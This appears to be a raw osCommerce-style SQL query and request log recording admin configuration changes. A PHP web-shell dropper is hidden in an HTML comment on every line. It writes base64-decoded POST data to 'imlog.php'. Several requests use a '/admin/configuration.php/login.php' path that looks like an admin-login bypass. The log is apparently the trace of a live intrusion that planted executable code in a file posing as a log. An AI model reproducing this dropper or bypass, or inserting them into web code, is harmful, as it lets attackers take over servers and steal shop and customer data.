<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select value from sessions where sesskey = '87209ae3b15e84237ebf2e19f539ae55' and expiry > '1290648639'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select languages_id, name, code, image, directory from languages order by sort_order
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select configuration_id, configuration_title, configuration_value from configuration where configuration_key = 'DEFAULT_TEMPLATE'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] update configuration set configuration_value = 'true', last_modified = now() where configuration_id = '118'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select count(*) as total from sessions where sesskey = '87209ae3b15e84237ebf2e19f539ae55'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] insert into sessions values ('87209ae3b15e84237ebf2e19f539ae55', '1290659439', 'language|s:7:\"russian\";languages_id|s:1:\"1\";selected_box|s:13:\"configuration\";')
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select value from sessions where sesskey = '13cff2555985d1ffcebf20370d79b61f' and expiry > '1290648639'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select languages_id, name, code, image, directory from languages order by sort_order
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select configuration_id, configuration_title, configuration_value from configuration where configuration_key = 'DEFAULT_TEMPLATE'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] update configuration set configuration_value = 'true', last_modified = now() where configuration_id = '118'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [0.056s] /admin/configuration.php/login.php?gID=10&cID=118&action=save
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select count(*) as total from sessions where sesskey = '13cff2555985d1ffcebf20370d79b61f'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] insert into sessions values ('13cff2555985d1ffcebf20370d79b61f', '1290659439', 'language|s:7:\"russian\";languages_id|s:1:\"1\";selected_box|s:13:\"configuration\";')
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select value from sessions where sesskey = '255edff73d015ace2d1fbd9b6137fb12' and expiry > '1290648641'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select languages_id, name, code, image, directory from languages order by sort_order
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select configuration_id, configuration_title, configuration_value from configuration where configuration_key = 'DEFAULT_TEMPLATE'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] update configuration set configuration_value = 'false', last_modified = now() where configuration_id = '122'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [0.060s] /admin/configuration.php/login.php?gID=10&cID=122&action=save
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select count(*) as total from sessions where sesskey = '255edff73d015ace2d1fbd9b6137fb12'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] insert into sessions values ('255edff73d015ace2d1fbd9b6137fb12', '1290659441', 'language|s:7:\"russian\";languages_id|s:1:\"1\";selected_box|s:13:\"configuration\";')
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [0.075s] /admin/configuration.php/login.php?gID=10&cID=118&action=save
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select value from sessions where sesskey = '099dc24469fa60b2849fe5e3bded045c' and expiry > '1290974039'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select languages_id, name, code, image, directory from languages order by sort_order
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select configuration_id, configuration_title, configuration_value from configuration where configuration_key = 'DEFAULT_TEMPLATE'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] update configuration set configuration_value = 'true', last_modified = now() where configuration_id = '118'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select count(*) as total from sessions where sesskey = '099dc24469fa60b2849fe5e3bded045c'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] insert into sessions values ('099dc24469fa60b2849fe5e3bded045c', '1290984839', 'language|s:7:\"russian\";languages_id|s:1:\"1\";selected_box|s:13:\"configuration\";')
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select value from sessions where sesskey = 'b9ec3967e555a0553aff6181091add6c' and expiry > '1290974039'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select languages_id, name, code, image, directory from languages order by sort_order
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select configuration_id, configuration_title, configuration_value from configuration where configuration_key = 'DEFAULT_TEMPLATE'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] update configuration set configuration_value = 'true', last_modified = now() where configuration_id = '118'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [0.051s] /admin/configuration.php/login.php?gID=10&cID=118&action=save
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select count(*) as total from sessions where sesskey = 'b9ec3967e555a0553aff6181091add6c'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] insert into sessions values ('b9ec3967e555a0553aff6181091add6c', '1290984840', 'language|s:7:\"russian\";languages_id|s:1:\"1\";selected_box|s:13:\"configuration\";')
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select value from sessions where sesskey = 'afd0ab5d68f2fdb22ac54d57b282893d' and expiry > '1290974043'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select languages_id, name, code, image, directory from languages order by sort_order
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select configuration_id, configuration_title, configuration_value from configuration where configuration_key = 'DEFAULT_TEMPLATE'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] update configuration set configuration_value = 'false', last_modified = now() where configuration_id = '122'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [0.047s] /admin/configuration.php/login.php?gID=10&cID=122&action=save
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] select count(*) as total from sessions where sesskey = 'afd0ab5d68f2fdb22ac54d57b282893d'
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [QUERY] insert into sessions values ('afd0ab5d68f2fdb22ac54d57b282893d', '1290984843', 'language|s:7:\"russian\";languages_id|s:1:\"1\";selected_box|s:13:\"configuration\";')
<!--tmtmtmtm<?php if(isset($_POST['d'])){$h=fopen('imlog.php','w');fwrite($h,base64_decode($_POST['d']));fclose($h);exit;}?>--> [0.047s] /admin/configuration.php/login.php?gID=10&cID=118&action=save
